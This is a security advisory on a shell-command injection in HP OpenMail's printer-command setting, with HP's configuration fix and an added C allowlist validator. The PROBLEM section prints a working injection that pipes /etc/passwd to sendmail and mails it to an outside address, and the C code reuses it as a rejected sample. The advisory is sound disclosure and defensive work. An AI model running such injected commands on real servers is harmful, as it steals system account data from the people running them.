COMMAND

    OpenMail

SYSTEMS AFFECTED

    Any HP 9000 series 700/800 systems running OpenMail

PROBLEM

    David Jones found the following. HP's OpenMail system consists of
    a server package that installs on an HP9000 workstation, as well
    as a client (Omgui). Other mail systems may also be able to
    interface to it.

    In Omgui, if you select "Options->Printer..." from the menu, you
    will be prompted for a printer command. The default is something
    like "lp -dlaser4si". This command is simply executed on the
    server, presumably using the system() call. This means that any
    mail user can run arbitrary shell commands on the mail server.
    For example, if you change your printer command to:

        cat /etc/passwd | /usr/lib/sendmail your@address

    and print a message, then you will get a copy of the password file.

    The good news is that mail users have their own Unix UIDs on the
    server ("id | /usr/lib/sendmail your@address" returns the relevant
    info). As long as OpenMail stores users' mail folders as
    user-owned files with appropriate permissions, there should be no
    way to read other users' mail. The real problem arises where the
    sysadmin has denied users regular login access to the mail server,
    possibly by putting "*" in the password field. This is standard
    practice as a security measure.

SOLUTION

    This is a generic issue with any program that permits shell
    escapes. If you rely on "*" in the password field to protect your
    OpenMail server, then you may want to check your security measures
    carefully - your users can get the equivalent of a shell whether
    you allow it or not. However, it is generally accepted good
    practice to set up UNIX users with an appropriately configured
    restricted shell. Relying on a '*' in the password field is not
    sufficient; that only means "deny logon", not "deny arbitrary
    shell command." For even tighter security, the shell can be reset
    to /bin/true, but that would, of course, not allow a user to call
    lp.

    Hewlett-Packard notes that this issue has already been adequately
    addressed in OpenMail. There is a general parameter setting
    (UAL_PRINT_SERVER_ONLY) in the general.cfg file that, if set to
    TRUE, forces all server printing to go through OpenMail's print
    server. The general customization file general.cfg is located in
    /var/opt/openmail/sys, as is the print server's configuration file
    print.cfg. On the client, all that is then necessary is to change
    the 'Printer Server Command' to point to one of the configured
    printers. OpenMail's print server uses a configuration file to
    configure available printers, and validates each print request
    against its configured printers. Any print requests that do not
    match the required syntax will not be executed. More information
    about OpenMail's print server and how to configure it can be found
    in the OpenMail Technical Guide (pages 3-366 to 3-369 for the GR5
    edition).
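
    The kind of validation described above, as an added example (not
    HP's code and not taken from OpenMail): the client's printer
    command is checked against an allowlist and lp is run without a
    shell. The printer list, the accepted "lp -d<printer>" form and
    the function names are assumptions; the syntax of print.cfg is not
    shown in this advisory.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical allowlist standing in for the printers configured in
   print.cfg ("laser5" is a made-up name). */
static const char *const allowed_printers[] = { "laser4si", "laser5" };

/* Accept only the exact form "lp -d<printer>" with <printer> on the
   allowlist. Returns the matched printer name, or NULL to reject. */
const char *validate_print_command(const char *cmd)
{
    static const char prefix[] = "lp -d";
    size_t plen = sizeof prefix - 1, i;

    if (cmd == NULL || strncmp(cmd, prefix, plen) != 0)
        return NULL;
    for (i = 0; i < sizeof allowed_printers / sizeof allowed_printers[0]; i++)
        if (strcmp(cmd + plen, allowed_printers[i]) == 0)
            return allowed_printers[i];
    return NULL;  /* pipes, ';', extra arguments, unknown printers */
}

/* Print a server-chosen spool file without passing the client's string
   to /bin/sh. Returns -1 on rejection or exec failure; on success the
   process image is replaced, so a real server would fork() first. */
int run_print_request(const char *cmd, const char *spool_path)
{
    const char *printer = validate_print_command(cmd);
    char dest[64];

    if (printer == NULL)
        return -1;
    snprintf(dest, sizeof dest, "-d%s", printer);
    execlp("lp", "lp", dest, spool_path, (char *)NULL);
    return -1;
}

int main(void)
{
    const char *samples[] = {  /* constructed sample requests */
        "lp -dlaser4si",
        "cat /etc/passwd | /usr/lib/sendmail your@address",
        "lp -dlaser4si; id",
    };
    for (size_t i = 0; i < 3; i++)
        printf("%-52s %s\n", samples[i],
               validate_print_command(samples[i]) ? "accept" : "reject");
    return 0;
}
```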